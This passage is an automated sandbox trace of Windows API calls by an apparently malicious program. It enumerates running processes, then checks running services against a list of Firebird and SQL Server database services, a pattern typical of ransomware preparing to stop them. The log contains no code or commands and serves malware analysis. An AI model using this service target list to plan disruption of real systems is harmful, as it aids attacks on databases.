Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.782] lstrlenW (lpString="taskhostw.exe") returned 13 [0052.782] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0052.783] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0052.783] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0052.783] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0052.783] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0052.784] lstrlenW (lpString="explorer.exe") returned 12 [0052.784] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0052.785] lstrlenW (lpString="Memory Compression") returned 18 [0052.785] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0052.786] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0052.786] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0052.787] lstrlenW (lpString="SearchUI.exe") returned 12 [0052.787] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0052.788] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0052.788] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.788] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0052.788] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.789] lstrlenW (lpString="taskhostw.exe") returned 13 [0052.789] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0052.790] lstrlenW (lpString="UsoClient.exe") returned 13 [0052.790] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0052.791] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0052.791] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.792] lstrlenW (lpString="taskhostw.exe") returned 13 [0052.792] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0052.792] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0052.792] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0052.793] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0052.793] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0052.794] lstrlenW (lpString="msoia.exe") returned 9 [0052.794] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0052.794] lstrlenW (lpString="msoia.exe") returned 9 [0052.794] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0052.795] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0052.795] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0052.796] lstrlenW (lpString="screensaver.exe") returned 15 [0052.796] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0052.796] lstrlenW (lpString="xml upper.exe") returned 13 [0052.796] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0052.797] lstrlenW (lpString="defeat preston.exe") returned 18 [0052.797] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0052.798] lstrlenW (lpString="boss isolated.exe") returned 17 [0052.798] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0052.798] lstrlenW (lpString="member.exe") returned 10 [0052.798] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0052.799] lstrlenW (lpString="chubby-er.exe") returned 13 [0052.799] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0052.800] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0052.800] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0052.801] lstrlenW (lpString="organization.exe") returned 16 [0052.801] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0052.801] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0052.801] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0052.802] lstrlenW (lpString="spray-roman.exe") returned 15 [0052.802] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0052.803] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0052.803] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0052.803] lstrlenW (lpString="tank attacks.exe") returned 16 [0052.803] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0052.804] lstrlenW (lpString="wires jacket.exe") returned 16 [0052.804] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0052.805] lstrlenW (lpString="values.exe") returned 10 [0052.805] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0052.806] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0052.806] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0052.807] lstrlenW (lpString="printersaerospace.exe") returned 21 [0052.807] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0052.807] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0052.807] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0052.808] lstrlenW (lpString="dllhost.exe") returned 11 [0052.808] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0052.809] lstrlenW (lpString="joke.exe") returned 8 [0052.809] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0052.811] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0052.811] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0052.811] lstrlenW (lpString="documents.exe") returned 13 [0052.811] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0052.812] lstrlenW (lpString="rebel.exe") returned 9 [0052.812] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0052.813] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0052.813] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.814] lstrlenW (lpString="conhost.exe") returned 11 [0052.814] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.814] lstrlenW (lpString="conhost.exe") returned 11 [0052.814] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0052.815] lstrlenW (lpString="hgaibc.exe") returned 10 [0052.815] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.816] lstrlenW (lpString="cmd.exe") returned 7 [0052.816] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0052.817] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0052.817] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.817] lstrlenW (lpString="conhost.exe") returned 11 [0052.817] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.818] lstrlenW (lpString="conhost.exe") returned 11 [0052.818] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.819] lstrlenW (lpString="svchost.exe") returned 11 [0052.819] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0052.820] CloseHandle (hObject=0x324) returned 1 [0052.820] Sleep (dwMilliseconds=0x1f4) [0053.326] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ec00 [0053.326] EnumServicesStatusExW (in: hSCManager=0x60ec00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0053.326] GetLastError () returned 0xea [0053.327] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0053.327] EnumServicesStatusExW (in: hSCManager=0x60ec00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0053.327] CloseServiceHandle (hSCObject=0x60ec00) returned 1 [0053.328] lstrlenW (lpString="Appinfo") returned 7 [0053.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0053.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0053.328] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0053.328] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0053.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0053.328] lstrlenW (lpString="AppXSvc") returned 7 [0053.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0053.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0053.328] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0053.328] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0053.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0053.328] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0053.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.328] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0053.328] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0053.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0053.328] lstrlenW (lpString="Audiosrv") returned 8 [0053.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0053.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0053.328] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0053.328] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0053.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0053.328] lstrlenW (lpString="BFE") returned 3 [0053.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0053.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0053.329] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0053.329] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0053.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0053.329] lstrlenW (lpString="BITS") returned 4 [0053.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0053.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0053.329] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0053.329] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0053.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0053.329] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0053.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0053.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0053.329] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0053.329] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0053.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0053.329] lstrlenW (lpString="CDPSvc") returned 6 [0053.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0053.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0053.329] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0053.329] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0053.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0053.329] lstrlenW (lpString="ClickToRunSvc") returned 13 [0053.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0053.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0053.329] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0053.329] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0053.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0053.329] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0053.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0053.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0053.329] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0053.329] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0053.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0053.330] lstrlenW (lpString="CryptSvc") returned 8 [0053.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0053.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0053.330] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0053.330] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0053.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0053.330] lstrlenW (lpString="DcomLaunch") returned 10 [0053.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.330] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0053.330] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0053.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0053.330] lstrlenW (lpString="DeviceAssociationService") returned 24 [0053.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0053.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0053.330] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0053.330] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0053.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0053.330] lstrlenW (lpString="Dhcp") returned 4 [0053.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0053.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0053.330] lstrcmpiW (lpString1="sqlwriter", 